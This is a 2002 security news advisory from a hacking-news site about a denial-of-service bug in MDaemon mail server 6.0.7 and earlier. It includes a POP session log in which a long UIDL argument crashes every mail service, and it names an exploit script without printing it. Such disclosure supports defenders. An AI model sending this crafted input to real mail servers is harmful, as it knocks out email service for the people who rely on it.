Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » MDaemon SMTP/POP/IMAP server DoS

MDaemon SMTP/POP/IMAP server DoS

by Nikola Strahija on October 28th, 2002 It's possible to crash a mdaemon mail server by sending long arguments with certain commands. Vulnerable versions are v.6.0.7 and bellow.


Overview


>From MDaemon's help file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs of
any number of individual users and comes complete with a powerful set
of integrated tools for managing mail accounts and message formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."

Problem


Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
sending long arguments (32b and above) with DELE or UIDL commands.
To do this u must have at least mail-account on vulnerable host.
After geting long request from client, all MDaemon's Services will be
closed (smtp, imap, pop, (?)worldclient).
Here the log of attack on local MDaemon POP-server:

+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 [email protected]>
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK [email protected]'s mailbox has 1 total messages (18356 octets).
UIDL 11111111111111111111111111111111

Connection to host lost...

Exploit


Exploit can be downloaded from our Exploits DB: mdaemon-argument-buffer.pl.txt


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »